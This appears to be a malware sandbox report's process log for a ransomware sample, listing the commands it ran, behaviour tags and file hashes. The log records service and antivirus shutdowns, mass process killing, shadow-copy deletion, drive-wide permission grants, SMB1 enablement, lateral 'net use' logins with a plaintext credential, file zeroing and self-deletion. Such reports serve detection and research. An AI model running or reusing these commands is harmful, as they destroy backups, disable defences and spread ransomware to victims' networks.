C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:2296
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵PID:2304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵PID:2924
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:2604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵PID:2880
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵PID:3820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:3292
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:2704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵PID:3832
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:572
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:2756
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:2208
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:2464
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:2372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:3416
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:3200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:3868
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:2676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:3048
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3828 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2504 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3124 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3268 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2656 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3272 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2316 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3100 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:936 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2252 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2516 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3068 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3196 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188 -
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵PID:2356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:2952
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:2136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:4244
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:2732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:3600
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3388 -
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1080
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:964
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:940 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3848 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2572 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3680 -
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵PID:2328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:2116
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:3144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:2908
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵PID:2972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:3984
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:2484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:3800
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:4040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:3192
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:2388
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
PID:888 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4052 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3484 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3540 -
C:\Windows\system32\cmd.exe"cmd.exe" /c net view2⤵PID:752
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:4360 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3508 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3928 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3940 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4020 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2284 -
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:524 -
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:3056 -
C:\Windows\system32\arp.exe"arp" -a2⤵PID:5060
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.10\Users /USER:d.rustamov 644468462⤵PID:4336
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.10\Users /USER:2⤵PID:4364
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\Users /USER:2⤵PID:3316
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\Users /USER:d.rustamov 644468462⤵PID:2968
-
C:\Windows\system32\net.exe"net.exe" use "\\MRBKYMNO\" /USER:d.rustamov 644468462⤵PID:3036
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3683.bat2⤵PID:2216
-
C:\Windows\system32\net.exe"net.exe" use "\\MRBKYMNO\" /USER:2⤵PID:4600
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:4592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe2⤵
- Deletes itself
PID:3344 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4244
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2152
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4076 -
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y1⤵PID:2460
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "495509003210231438056457937816027281691098293190-187288732314128356142146993008"1⤵PID:2508
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "130648841460027729-1877919121939594528-114490520014118598061498087057442901440"1⤵PID:2500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:1356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:2696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18034369721979009320488044411593999301-17827841872081934220936431303622620552"1⤵PID:2112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y2⤵PID:2268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-88300685815815162401225110152-1840254462-197679409511698044921976808197-2074448225"1⤵PID:3724
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "178399211049532893344164614215042801241815335873-70926396820664123671835499644"1⤵PID:3524
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1177182519-163407135017851178491722587936-35572988324935742018180592211101427827"1⤵PID:3432
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "113754351184479920633952647-5278228551255207793-1829398366-95734888458949381"1⤵PID:2064
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1807060271418463034-3179165801094417392-1848267739-16020750962100231670143128254"1⤵PID:3288
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2143241986-1513979916-853821850-2091479951-1432388280-243640775-153425933103784960"1⤵PID:2568
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1748787083-20254476231203153414-29675323-1127320453-416102942-1741872149257248894"1⤵PID:2140
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1092060117-288063398-17263171381973385389-1576687708-1105001086-1758608163959861799"1⤵PID:2744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-941407417102771084277267979611477969665880117-2636039831613261508306219869"1⤵PID:2872
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17846775241180888495-1168371101084993478-657577720-76359511015077902701942432868"1⤵PID:4012
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-272571851798147171-84999065620274222861073376794-6031474424807878791812184394"1⤵PID:2864
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-320566445-171677215253238862-7450757275595804071194008991-814497435-516194514"1⤵PID:2960
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1414767290-831466543-18536519167789529361441058971-1835366081-1536457981408143095"1⤵PID:2856
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "19445464301444836803411788499-168626073519645534811553744369-1436492765-591755977"1⤵PID:3988
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "161949364-11021964251454162460-1633048453-1917134264-3134212531175797488-1263479598"1⤵PID:3040
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-516230278-15943610439927081571727147353-1330982828-1656930711-1458856660-536199717"1⤵PID:560
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-538998337-1996176807-4917388171921860218-271890875758641635-1968505968-1729221781"1⤵PID:2944
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-254458296-5380881931791860969-908709736558998385-271494614-911504158-1045063791"1⤵PID:1624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1398157670459663594-21032467641790456670-17482385961110391313-5090538791709718337"1⤵PID:2588
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12895280794076594311869020782-857101585-4832746102104725668-7589497141823722683"1⤵PID:2120
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1399143429-375649459-1700794903-190475780198904789347417096-67952581761680221"1⤵PID:2936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-119496549-1378514071-209207773618710631561864757182251901231-20174478441075415570"1⤵PID:2828
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15469008491166151571-188686056710203705201877085164-201344827-782456547-101026085"1⤵PID:308
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9141663412135292374770380922-1439764845-15851718551586378613982160295-1212194643"1⤵PID:2820
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-17719748891866635239-204767081-166968631485794257911450643641688057945128501146"1⤵PID:2096
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-371816465-226661153-995430568175375232815381421638134067911909118482-2032159817"1⤵PID:2928
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2113854270-1977292861-766370917205935730-1469446320633508756-1496991686-1814496363"1⤵PID:2576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "682020618-179281898641240142-992705402-1515433608-2045185262-12830365931233237385"1⤵PID:2436
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "981811285455223837210822801-1594912808-1477327756-1323892102123300599469895568"1⤵PID:1588
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "128917010-16006121-1596056163-748973429-778914038-1581270318-8585983421255003548"1⤵PID:2056
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "6881964131181869170-86578583-54084765-7827901851889046511433829789105874986"1⤵PID:2804
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-429209517-1745564107-1680014279625698335706247876-26902171718504473951165433206"1⤵PID:2384
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-968253330741258883-16598211292005664218-16507771171822894904-12476734871376943901"1⤵PID:3176
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11035219973953527871420524023-2082788469-666533418-2126708420-1269156072-1226252360"1⤵PID:2776
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "45152621-1877240906-2024413401052347464552197193-687155151-2904294731446951713"1⤵PID:2768
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1175120708-2037302709886162256-7285756332146255801-1102150727-11998610121073752770"1⤵PID:2760
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "855078274-9719817552200260875765350839048645844250140961628630799-1060419296"1⤵PID:2292
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "468055822313556213-2507388121054065767-1722362627263584134-5349309291756489903"1⤵PID:1636
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3509726453765834622115779261670257904523494876-1967034842926212078420168571"1⤵PID:368
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12472419271379015085-1219758415-6323090621929014301916746751821168781450816266"1⤵PID:1852
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\ResumeRename.vstx1⤵
- Modifies registry class
PID:3440
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
00c21b618f79f924ec1ac1ec111cc0cf
SHA15584f7e04bcf669ef302e630e27ca0dc98a6d84b
SHA2569869a35d0f2680b1d34985a178356e6f40567b1a8a2024f2980f629b9395b7f6
SHA512a88cab8ca0208abb3e90a83dd5e87b0ee04d9d388da67e9842c296cdc39d32531e77255f52f189b53c631219528ea6e9e0263304781edb906940522fc46c2690
-
MD5
6f47970bd915ab3d24f0cf5a24223718
SHA1791ba6733e718d5289b5e7e13d13efb93ec5033f
SHA2562c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60
SHA512fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5a485c844233bfbbc02225216182ba2e2
SHA196e6da3e3e0616c563ec66ee60676add0ad4401d
SHA25657fc5452ce6227b909d5567ecabf5fc6e1d436d7735f80cbaac0344ff5cd9e90
SHA51226fbe7babea0517590f49c294f8ac592dd425e1a273306620f4e2ab8c1c30c81ac2265b06cbb66f61c0c714374c236c8a7c5bf9c408461e62f1046457a46c01b
-
MD5
a71c5fa7dd251d451adfaed3b066efc3
SHA146b8300d97a30a6f3334099c7f61563ec4a5312e
SHA2565143085d90af962c1f35b979d27fe35b8fd22e0c0f5d3a72c7f3be1f2428178c
SHA51297395d4a2803756f7a81d7a108cefa60c0674cd74f767cccb7db31c7386db38120f01c4e5660a24313ed1ff13646dd1ab2d3a568cc7021a09666360f03d5f3bc
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e